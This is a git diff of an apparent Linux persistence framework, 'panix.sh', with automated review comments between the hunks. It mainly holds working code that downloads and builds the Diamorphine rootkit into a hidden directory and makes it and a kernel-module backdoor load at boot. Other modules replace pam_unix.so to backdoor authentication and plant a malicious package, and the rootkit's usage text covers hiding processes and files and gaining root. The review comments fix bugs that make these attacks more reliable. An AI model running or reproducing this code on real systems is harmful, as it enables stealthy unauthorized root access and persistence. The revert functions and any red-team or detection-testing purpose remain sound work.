-        if [ "$downloader" = "wget" ]; then
-            wget -O "$output" "$url"
-        else
-            curl -L -o "$output" "$url"
-        fi
-    }
-    # Check for zip/unzip
-    if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
-        echo "zip/unzip is available. Downloading diamorphine.zip..."
-        download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
-        unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
+	echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
+	echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
+	echo "[!] I cannot guarantee that it will work on other distributions."
+	sleep 5
+	mkdir -p $rk_path
+	# Check if wget or curl is installed
+	if command -v wget >/dev/null 2>&1; then
+		downloader="wget"
+	elif command -v curl >/dev/null 2>&1; then
+		downloader="curl"
+	else
+		echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
+		exit 1
+	fi
+	# Function to download files using the available downloader
+	download_file() {
+		local url="$1"
+		local output="$2"
+		if [ "$downloader" = "wget" ]; then
+			wget -O "$output" "$url"
+		else
+			curl -L -o "$output" "$url"
+		fi
+	}
+	# Check for zip/unzip
+	if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
+		echo "zip/unzip is available. Downloading diamorphine.zip..."
+		download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
+		unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
 		mv ${tmp_path}/diamorphine/Diamorphine-master/* "${rk_path}/"
-    # Check for tar
-    elif command -v tar >/dev/null 2>&1; then
-        echo "tar is available. Downloading diamorphine.tar..."
-        download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
-        tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
+	# Check for tar
+	elif command -v tar >/dev/null 2>&1; then
+		echo "tar is available. Downloading diamorphine.tar..."
+		download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
+		tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
-    # Check for git
-    elif command -v git >/dev/null 2>&1; then
-        echo "git is available. Cloning diamorphine.git..."
-        git clone "${clone_url}" "${tmp_path}/diamorphine"
+	# Check for git
+	elif command -v git >/dev/null 2>&1; then
+		echo "git is available. Cloning diamorphine.git..."
+		git clone "${clone_url}" "${tmp_path}/diamorphine"
 		mv ${tmp_path}/diamorphine/* "${rk_path}/"
-    # If none are available
-    else
-        echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
-        exit 1
-    fi
+	# If none are available
+	else
+		echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
+		exit 1
+	fi
 	# Obfuscate most obvious strings
 	# Files
@@ -186,15 +186,32 @@ setup_rootkit() {
 	make -C ${rk_path} clean
-    touch ${rk_path}/restore_${identifier}.ko
+	touch ${rk_path}/restore_${identifier}.ko
+	# Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+	echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d..."
+	if [ -d "/etc/modules-load.d" ]; then
+		echo "${identifier}" > /etc/modules-load.d/${identifier}.conf
+	fi
+	if [ -d "/usr/lib/modules-load.d" ]; then
+		echo "${identifier}" > /usr/lib/modules-load.d/${identifier}.conf
+	fi
+	if [ -f "/etc/modules" ]; then
+		if ! grep -q "^${identifier}$" /etc/modules; then
+			echo "${identifier}" >> /etc/modules
+		fi
+	fi
 	echo "[+] Diamorphine rootkit has been installed."
-    echo "[+] The secret is: ${secret}"
-    echo "[+] The identifier is: ${identifier}"
-    echo "[+] kill -31 pid: hide/unhide any process;"
-    echo "[+] kill -63 pid: turns the module (in)visible;"
-    echo "[+] kill -64 pid: become root;"
-    echo "[+] Any file starting with ${secret} is hidden."
-    echo "[+] Source: https://github.com/m0nad/Diamorphine"
+	echo "[+] The secret is: ${secret}"
+	echo "[+] The identifier is: ${identifier}"
+	echo "[+] kill -31 pid: hide/unhide any process;"
+	echo "[+] kill -63 pid: turns the module (in)visible;"
+	echo "[+] kill -64 pid: become root;"
+	echo "[+] Any file starting with ${secret} is hidden."
+	echo "[+] Source: https://github.com/m0nad/Diamorphine"
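Review bot: The added `grep -q "^${identifier}$" /etc/modules` test reads the identifier as a regular expression, and the redirect targets `/etc/modules-load.d/${identifier}.conf` and `/usr/lib/modules-load.d/${identifier}.conf` are unquoted. A value containing `.` can match an unrelated line, one containing `/` points the redirect outside the directory in this root-run script, and whitespace makes the redirect ambiguous. Where the identifier is set is not visible in this hunk; if it can come from the command line, restrict it to something like `^[A-Za-z0-9_-]+$` first, then use `grep -qxF -- "${identifier}" /etc/modules` and quote the paths. The same block is repeated in the panix.sh copy of setup_rootkit (hunk `-5057,17`) and, with `${lkm_name}`, in setup_lkm_backdoor (hunk `-2494,19`). The function body starts and ends outside this hunk.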
diff --git a/panix.sh b/panix.sh
index dd13d38..79c2d68 100644
--- a/panix.sh
+++ b/panix.sh
@@ -2408,10 +2408,10 @@ setup_lkm_backdoor() {
 		# Ensure proper escaping for C string
-        mkdir -p $(dirname $lkm_destination)
+		mkdir -p $(dirname $lkm_destination)
-    mkdir -p ${lkm_compile_dir}
+	mkdir -p ${lkm_compile_dir}
 	cat <<-EOF > ${lkm_source}
 	#include <linux/module.h>
@@ -2454,12 +2454,12 @@ setup_lkm_backdoor() {
-    # Check if the source file was created
-    if [ ! -f "$lkm_source" ]; then
-        echo "Failed to create the kernel module source code at $lkm_source"
-        exit 1
-    else
-		echo "Kernel module source code created: $lkm_source"
+	# Check if the source file was created
+	if [ ! -f "$lkm_source" ]; then
+		echo "[-] Failed to create the kernel module source code at $lkm_source"
+		exit 1
+	else
+		echo "[+] Kernel module source code created: $lkm_source"
 	# Create the Makefile
@@ -2474,11 +2474,11 @@ clean:
 	make -C /lib/modules/\$(shell uname -r)/build M=\$(PWD) clean
-    if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
-		echo "Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
+	if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
+		echo "[-] Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
 		exit 1
-    else
-		echo "Makefile created: ${lkm_compile_dir}/Makefile"
+	else
+		echo "[+] Makefile created: ${lkm_compile_dir}/Makefile"
 	# Compile the kernel module using make
@@ -2486,7 +2486,7 @@ EOF
 	if [ $? -ne 0 ]; then
-		echo "Compilation failed. Exiting."
+		echo "[-] Compilation failed. Exiting."
 		exit 1
@@ -2494,19 +2494,36 @@ EOF
 	cp ${lkm_compile_dir}/${lkm_name}.ko ${lkm_destination}
 	if [ $? -ne 0 ]; then
-		echo "Copying module failed. Exiting."
+		echo "[-] Copying module failed. Exiting."
 		exit 1
-	echo "Kernel module compiled successfully: ${lkm_destination}"
+	echo "[+] Kernel module compiled successfully: ${lkm_destination}"
 	sudo insmod ${lkm_destination}
 	if [[ $? -ne 0 ]]; then
-		echo "Failed to load the kernel module. Check dmesg for errors."
+		echo "[-] Failed to load the kernel module. Check dmesg for errors."
 		exit 1
-	echo "Kernel module loaded successfully. Check dmesg for the output."
+	# Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+	echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+	if [ -d "/etc/modules-load.d" ]; then
+		echo "${lkm_name}" > /etc/modules-load.d/${lkm_name}.conf
+	fi
+	if [ -d "/usr/lib/modules-load.d" ]; then
+		echo "${lkm_name}" > /usr/lib/modules-load.d/${lkm_name}.conf
+	fi
+	if [ -f "/etc/modules" ]; then
+		if ! grep -q "^${lkm_name}$" /etc/modules; then
+			echo "${lkm_name}" >> /etc/modules
+		fi
+	fi
+	echo "[+] Kernel module loaded successfully. Check dmesg for the output."
+	echo "[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
 	echo "[+] LKM backdoor established!"
@@ -2566,6 +2583,12 @@ revert_lkm() {
 		echo "[-] Temporary directory '${lkm_compile_dir}' not found."
+	# Remove panix from /etc/modules, /etc/modules-load.d/panix.conf and /usr/lib/modules-load.d/panix.conf
+	echo "[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+	sed -i '/panix/d' /etc/modules
+	rm -f /etc/modules-load.d/panix.conf
+	rm -f /usr/lib/modules-load.d/panix.conf
 	# Update module dependencies
 	echo "[+] Updating module dependencies..."
 	depmod -a
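Review bot: `sed -i '/panix/d' /etc/modules` deletes every line that merely contains "panix" and runs even when /etc/modules does not exist. The setup side guards with `[ -f "/etc/modules" ]` and writes exactly `${lkm_name}`, so the two should mirror each other. Anchor and guard it, e.g. `[ -f /etc/modules ] && sed -i '/^panix$/d' /etc/modules`. Setup also names the drop-in files after `${lkm_name}` while this revert hardcodes `panix.conf`; if the module name can differ (not visible here), the revert leaves the load entries behind. revert_lkm's body starts and ends outside this hunk.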
@@ -2884,97 +2907,104 @@ setup_malicious_package() {
 # Revert Module: revert_malicious_package.sh
 revert_malicious_package() {
-    usage_revert_malicious_package() {
-        echo "Usage: ./panix.sh --revert malicious-package"
-        echo "Reverts any changes made by the setup_malicious_package module."
-    }
+	usage_revert_malicious_package() {
+		echo "Usage: ./panix.sh --revert malicious-package"
+		echo "Reverts any changes made by the setup_malicious_package module."
+	}
-    echo "[+] Reverting malicious package..."
+	echo "[+] Reverting malicious package..."
-    if ! check_root; then
-        echo "Error: This function can only be run as root."
-        return 1
-    fi
+	if ! check_root; then
+		echo "Error: This function can only be run as root."
+		return 1
+	fi
-    local mechanism=""
-    local PACKAGE_NAME="panix"
+	local mechanism=""
+	local PACKAGE_NAME="panix"
-    # Detect if RPM or DPKG was used
-    if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
-        mechanism="rpm"
-    elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii  ${PACKAGE_NAME} "; then
-        mechanism="dpkg"
-    else
-        echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
-    fi
+	# Detect if RPM or DPKG was used
+	if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
+		mechanism="rpm"
+	elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii  ${PACKAGE_NAME} "; then
+		mechanism="dpkg"
+	else
+		echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
+	fi
-    if [[ "$mechanism" == "rpm" ]]; then
-        echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
-        rpm -e --noscripts "${PACKAGE_NAME}"
-        if [[ $? -eq 0 ]]; then
-            echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
-        else
-            echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
-        fi
+	if [[ "$mechanism" == "rpm" ]]; then
+		echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
+		rpm -e --noscripts "${PACKAGE_NAME}"
+		if [[ $? -eq 0 ]]; then
+			echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
+		else
+			echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
+		fi
-        # Remove the RPM file from /var/lib/rpm
-        if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
-            echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
-            rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
-            echo "[+] RPM file removed."
-        else
-            echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
-        fi
+		# Remove the RPM file from /var/lib/rpm
+		if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
+			echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
+			rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
+			echo "[+] RPM file removed."
+		else
+			echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
+		fi
-    elif [[ "$mechanism" == "dpkg" ]]; then
-        echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
-        dpkg --purge "${PACKAGE_NAME}"
-        if [[ $? -eq 0 ]]; then
-            echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
-        else
-            echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
-        fi
-    fi
+	elif [[ "$mechanism" == "dpkg" ]]; then
+		echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
+		dpkg --purge "${PACKAGE_NAME}"
+		if [[ $? -eq 0 ]]; then
+			echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
+		else
+			echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
+		fi
+	fi
-    # Remove the cron job added by the setup function
-    echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
-    # Create a temporary file to store the current crontab
-    crontab -l > /tmp/current_cron$$ 2>/dev/null
-    if [[ $? -ne 0 ]]; then
-        echo "[-] No crontab for user $(whoami). No action needed."
-        rm -f /tmp/current_cron$$
-    else
-        # Remove lines containing the malicious package commands
-        grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
-        # Install the new crontab
-        crontab /tmp/new_cron$$
-        echo "[+] Cron job removed."
-        # Clean up temporary files
-        rm -f /tmp/current_cron$$ /tmp/new_cron$$
-    fi
+	# Remove the cron job added by the setup function
+	echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
+	# Create a temporary file to store the current crontab
+	crontab -l > /tmp/current_cron$$ 2>/dev/null
+	if [[ $? -ne 0 ]]; then
+		echo "[-] No crontab for user $(whoami). No action needed."
+		rm -f /tmp/current_cron$$
+	else
+		# Remove lines containing the malicious package commands
+		grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
+		# Install the new crontab
+		crontab /tmp/new_cron$$
+		echo "[+] Cron job removed."
+		# Clean up temporary files
+		rm -f /tmp/current_cron$$ /tmp/new_cron$$
+	fi
-    # Clean up any remaining build directories (RPM)
-    if [[ -d "~/rpmbuild" ]]; then
-        echo "[+] Removing RPM build directory '~/rpmbuild'..."
-        rm -rf ~/rpmbuild
-        echo "[+] RPM build directory removed."
-    fi
+	# Clean up any remaining build directories (RPM)
+	if [[ -d "~/rpmbuild" ]]; then
+		echo "[+] Removing RPM build directory '~/rpmbuild'..."
+		rm -rf ~/rpmbuild
+		echo "[+] RPM build directory removed."
+	fi
-    # Clean up any remaining package directories (DPKG)
-    if [[ -d "${PACKAGE_NAME}" ]]; then
-        echo "[+] Removing package directory '${PACKAGE_NAME}'..."
-        rm -rf "${PACKAGE_NAME}"
-        echo "[+] Package directory removed."
-    fi
+	# Clean up any remaining package directories (DPKG)
+	if [[ -d "${PACKAGE_NAME}" ]]; then
+		echo "[+] Removing package directory '${PACKAGE_NAME}'..."
+		rm -rf "${PACKAGE_NAME}"
+		echo "[+] Package directory removed."
+	fi
-    # Remove any lingering files in /var/lib/dpkg/info (DPKG)
-    if [[ -d "/var/lib/dpkg/info" ]]; then
-        echo "[+] Cleaning up '/var/lib/dpkg/info'..."
-        rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
-        echo "[+] Cleanup completed."
-    fi
+	# Remove any lingering files in /var/lib/dpkg/info (DPKG)
+	if [[ -d "/var/lib/dpkg/info" ]]; then
+		echo "[+] Cleaning up '/var/lib/dpkg/info'..."
+		rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
+		echo "[+] Cleanup completed."
+	fi
-    return 0
+	# Remove any package files left in the home directory
+	if [[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]; then
+		echo "[+] Removing package files '~/${PACKAGE_NAME}.deb' and/or '~/${PACKAGE_NAME}.rpm'..."
+		rm -f ~/${PACKAGE_NAME}.deb ~/${PACKAGE_NAME}.rpm
+		echo "[+] Package files removed."
+	fi
+	return 0
 # Module: setup_motd_backdoor.sh
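Review bot: The new check `[[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]` can never be true, because a tilde inside double quotes is not expanded. The package files therefore stay in the home directory after a revert. Since `rm -f` is already a no-op for missing files, the test can be dropped in favour of `rm -f -- "$HOME/${PACKAGE_NAME}.deb" "$HOME/${PACKAGE_NAME}.rpm"`. The re-indented `[[ -d "~/rpmbuild" ]]` check above has the same problem and should use `"$HOME/rpmbuild"`.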
@@ -3585,9 +3615,11 @@ setup_pam_persistence() {
 			local dest_dir=""
 			local possible_dirs=(
-				"/usr/lib64/security"
-				"/lib/x86_64-linux-gnu/security"
+				"/lib/x86_64-linux-gnu/security"
+				"/usr/lib/security"
+				"/usr/lib64/security"
+				"/usr/lib/x86_64-linux-gnu/security"
 			for dir in "${possible_dirs[@]}"; do
@@ -3602,6 +3634,9 @@ setup_pam_persistence() {
 				exit 1
+			echo "[+] Backing up original PAM library..."
+			mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"
 			echo "[+] Copying PAM library to $dest_dir..."
 			mv -f modules/pam_unix/.libs/pam_unix.so "$dest_dir"
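Review bot: The backup `mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"` overwrites any existing `.bak`. Running the module twice therefore replaces the genuine backup with the already-modified library, and the revert then restores the wrong file. Moving the file also leaves the host with no `pam_unix.so` until the next `mv` succeeds, which can break authentication on the test system if that step fails. Copy instead, and only when no backup exists yet: `[[ -e "$dest_dir/pam_unix.so.bak" ]] || cp -p "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"`. The enclosing block continues outside the hunk.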
@@ -3769,52 +3804,29 @@ revert_pam() {
 		return 1
-	# Function to restore the original pam_unix.so module
-	restore_pam_module() {
-		echo "[+] Restoring original PAM module..."
-		# Detect the Linux distribution and package manager
-		if [ -f /etc/os-release ]; then
-			. /etc/os-release
-			linux_distro=${ID_LIKE:-$ID}
-		else
-			linux_distro=$(uname -s | tr '[:upper:]' '[:lower:]')
-		fi
-		case "$linux_distro" in
-			*ubuntu*|*debian*|*mint*|*kali*)
-				echo "[+] Detected Debian-based distribution."
-				echo "[+] Reinstalling 'libpam-modules' package..."
-				apt-get update >/dev/null 2>&1
-				apt-get install --reinstall -y libpam-modules >/dev/null 2>&1
-				if [[ $? -eq 0 ]]; then
-					echo "[+] 'libpam-modules' reinstalled successfully."
-				else
-					echo "[-] Failed to reinstall 'libpam-modules'."
-				fi
-				;;
-			*rhel*|*centos*|*fedora*)
-				echo "[+] Detected RPM-based distribution."
-				echo "[+] Reinstalling 'pam' package..."
-				if command -v yum &>/dev/null; then
-					yum reinstall -y pam >/dev/null 2>&1
-				elif command -v dnf &>/dev/null; then
-					dnf reinstall -y pam >/dev/null 2>&1
-				else
-					echo "[-] Neither 'yum' nor 'dnf' package manager found."
-					return 1
-				fi
+	remove_rogue_pam() {
+		echo "[+] Searching for rogue PAM module"
+		# Check for the presence of the malicious PAM module
+		pam_module_paths=(
+			"/lib/security/pam_unix.so"
+			"/usr/lib/security/pam_unix.so"
+			"/usr/lib64/security/pam_unix.so"
+			"/lib/x86_64-linux-gnu/security/pam_unix.so"
+			"/usr/lib/x86_64-linux-gnu/security/pam_unix.so"
+			"/lib64/security/pam_unix.so"
+		)
+		# Revert pam_unix.so with the pam_unix.so.bak backup 
+		for pam_module in "${pam_module_paths[@]}"; do
+			if [[ -f "$pam_module.bak" ]]; then
+				mv -f "$pam_module.bak" "$pam_module"
 				if [[ $? -eq 0 ]]; then
-					echo "[+] 'pam' reinstalled successfully."
+					echo "[+] Restored original PAM module '$pam_module'."
-					echo "[-] Failed to reinstall 'pam'."
+					echo "[-] Failed to restore original PAM module '$pam_module'."
-				;;
-			*)
-				echo "[-] Unsupported distribution: $linux_distro"
-				return 1
-				;;
-		esac
+			fi
+		done
 	# Function to remove malicious PAM_EXEC configurations and scripts
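Review bot: `remove_rogue_pam` trusts `pam_unix.so.bak` completely: when no backup is found the loop prints nothing and the replaced module stays in place, and when one is found nothing confirms that it is the distribution's file. The removed code reinstalled `libpam-modules` / `pam`, which gave that guarantee. Report the no-backup case and verify the result against the package database after the loop. `pam_module_paths` and `pam_module` should also be declared `local`. The function's closing lines are outside the hunk.

```shell
		local restored=false
		for pam_module in "${pam_module_paths[@]}"; do
			# … unchanged: mv of "$pam_module.bak" and its status messages; set restored=true on success …
		done
		if [[ "$restored" != true ]]; then
			echo "[-] No pam_unix.so.bak found; pam_unix.so was not restored."
		fi
		# Confirm the file on disk matches the packaged one
		if command -v dpkg &>/dev/null; then
			dpkg --verify libpam-modules
		elif command -v rpm &>/dev/null; then
			rpm -V pam
		fi
```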
@@ -3895,32 +3907,8 @@ revert_pam() {
-	# Check for the presence of the malicious PAM module
-	is_pam_module_replaced=false
-	pam_module_paths=(
-		"/lib/security/pam_unix.so"
-		"/usr/lib64/security/pam_unix.so"
-		"/lib/x86_64-linux-gnu/security/pam_unix.so"
-		"/lib64/security/pam_unix.so"
-	)
-	for pam_module in "${pam_module_paths[@]}"; do
-		if [[ -f "$pam_module" ]]; then
-			# Check if the pam_unix.so has been modified
-			if strings "$pam_module" | grep -q "PANIX"; then
-				is_pam_module_replaced=true
-				break
-			fi
-		fi
-	done
-	if [[ "$is_pam_module_replaced" = true ]]; then
-		echo "[+] Malicious PAM module detected."
-		restore_pam_module
-	else
-		echo "[-] No malicious PAM module detected."
-	fi
 	# Remove PAM_EXEC backdoor and logging
+	remove_rogue_pam
@@ -4870,25 +4858,25 @@ revert_reverse_shell() {
 # Module: setup_rootkit.sh
 setup_rootkit() {
-    # References:
-    # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
-    # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
-    # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
+	# References:
+	# Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
+	# Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
+	# Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
-    local rk_path="/dev/shm/.rk"
+	local rk_path="/dev/shm/.rk"
 	local tmp_path="/tmp"
-    local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
-    local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
-    local clone_url="https://github.com/Aegrah/Diamorphine.git"
-    local secret=""
-    local identifier=""
+	local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
+	local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
+	local clone_url="https://github.com/Aegrah/Diamorphine.git"
+	local secret=""
+	local identifier=""
 	if ! check_root; then
 		echo "Error: This function can only be run as root."
 		exit 1
-    usage_rootkit() {
+	usage_rootkit() {
 		echo "Usage: ./panix.sh --rootkit"
 		echo "--examples                 Display command examples"
 		echo "--secret <secret>          Specify the secret"
@@ -4953,57 +4941,57 @@ setup_rootkit() {
 		exit 1
-    echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
-    echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
-    echo "[!] I cannot guarantee that it will work on other distributions."
-    sleep 5
+	echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
+	echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
+	echo "[!] I cannot guarantee that it will work on other distributions."
+	sleep 5
-    mkdir -p $rk_path
+	mkdir -p $rk_path
-    # Check if wget or curl is installed
-    if command -v wget >/dev/null 2>&1; then
-        downloader="wget"
-    elif command -v curl >/dev/null 2>&1; then
-        downloader="curl"
-    else
-        echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
-        exit 1
-    fi
+	# Check if wget or curl is installed
+	if command -v wget >/dev/null 2>&1; then
+		downloader="wget"
+	elif command -v curl >/dev/null 2>&1; then
+		downloader="curl"
+	else
+		echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
+		exit 1
+	fi
-    # Function to download files using the available downloader
-    download_file() {
-        local url="$1"
-        local output="$2"
-        if [ "$downloader" = "wget" ]; then
-            wget -O "$output" "$url"
-        else
-            curl -L -o "$output" "$url"
-        fi
-    }
+	# Function to download files using the available downloader
+	download_file() {
+		local url="$1"
+		local output="$2"
+		if [ "$downloader" = "wget" ]; then
+			wget -O "$output" "$url"
+		else
+			curl -L -o "$output" "$url"
+		fi
+	}
-    # Check for zip/unzip
-    if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
-        echo "zip/unzip is available. Downloading diamorphine.zip..."
-        download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
-        unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
+	# Check for zip/unzip
+	if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
+		echo "zip/unzip is available. Downloading diamorphine.zip..."
+		download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
+		unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
 		mv ${tmp_path}/diamorphine/Diamorphine-master/* "${rk_path}/"
-    # Check for tar
-    elif command -v tar >/dev/null 2>&1; then
-        echo "tar is available. Downloading diamorphine.tar..."
-        download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
-        tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
+	# Check for tar
+	elif command -v tar >/dev/null 2>&1; then
+		echo "tar is available. Downloading diamorphine.tar..."
+		download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
+		tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
-    # Check for git
-    elif command -v git >/dev/null 2>&1; then
-        echo "git is available. Cloning diamorphine.git..."
-        git clone "${clone_url}" "${tmp_path}/diamorphine"
+	# Check for git
+	elif command -v git >/dev/null 2>&1; then
+		echo "git is available. Cloning diamorphine.git..."
+		git clone "${clone_url}" "${tmp_path}/diamorphine"
 		mv ${tmp_path}/diamorphine/* "${rk_path}/"
-    # If none are available
-    else
-        echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
-        exit 1
-    fi
+	# If none are available
+	else
+		echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
+		exit 1
+	fi
 	# Obfuscate most obvious strings
 	# Files
@@ -5057,17 +5045,34 @@ setup_rootkit() {
 	make -C ${rk_path} clean
-    touch ${rk_path}/restore_${identifier}.ko
+	touch ${rk_path}/restore_${identifier}.ko
+	# Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+	echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d..."
+	if [ -d "/etc/modules-load.d" ]; then
+		echo "${identifier}" > /etc/modules-load.d/${identifier}.conf
+	fi
+	if [ -d "/usr/lib/modules-load.d" ]; then
+		echo "${identifier}" > /usr/lib/modules-load.d/${identifier}.conf
+	fi
+	if [ -f "/etc/modules" ]; then
+		if ! grep -q "^${identifier}$" /etc/modules; then
+			echo "${identifier}" >> /etc/modules
+		fi
+	fi
 	echo "[+] Diamorphine rootkit has been installed."
-    echo "[+] The secret is: ${secret}"
-    echo "[+] The identifier is: ${identifier}"
-    echo "[+] kill -31 pid: hide/unhide any process;"
-    echo "[+] kill -63 pid: turns the module (in)visible;"
-    echo "[+] kill -64 pid: become root;"
-    echo "[+] Any file starting with ${secret} is hidden."
-    echo "[+] Source: https://github.com/m0nad/Diamorphine"
+	echo "[+] The secret is: ${secret}"
+	echo "[+] The identifier is: ${identifier}"
+	echo "[+] kill -31 pid: hide/unhide any process;"
+	echo "[+] kill -63 pid: turns the module (in)visible;"
+	echo "[+] kill -64 pid: become root;"
+	echo "[+] Any file starting with ${secret} is hidden."
+	echo "[+] Source: https://github.com/m0nad/Diamorphine"
 # Revert Module: revert_rootkit.sh
@@ -5173,6 +5178,24 @@ revert_rootkit() {
+	# Remove the module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+	echo "[+] Removing rootkit module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+	if [ -d "/etc/modules-load.d" ]; then
+		echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf
+	fi
+	if [ -d "/usr/lib/modules-load.d" ]; then
+		echo "${rk_name}" > /usr/lib/modules-load.d/${rk_name}.conf
+	fi
+	if [ -f "/etc/modules" ]; then
+		if grep -q "^${rk_name}$" /etc/modules; then
+			sed -i "/^${rk_name}$/d" /etc/modules
+		fi
+	fi
+	echo "[+] Rootkit module removed from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
 	# Step 4: Remove /dev/shm/.rk directory
 	remove_directory "$rk_path"
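Review bot: The "Removing rootkit module" block re-creates the load entries instead of deleting them. Both `echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf` and the `/usr/lib/modules-load.d` twin look copied from the setup function, so after a revert the host still tries to load the module at boot while the message reports it as removed. They should be `rm -f -- "/etc/modules-load.d/${rk_name}.conf"` and `rm -f -- "/usr/lib/modules-load.d/${rk_name}.conf"`. Setup names these files after `${identifier}`; whether `rk_name` holds the same value is not visible in this hunk and should be confirmed. The inner `grep -q` guard is redundant, because `sed -i "/^${rk_name}$/d"` is already a no-op when nothing matches.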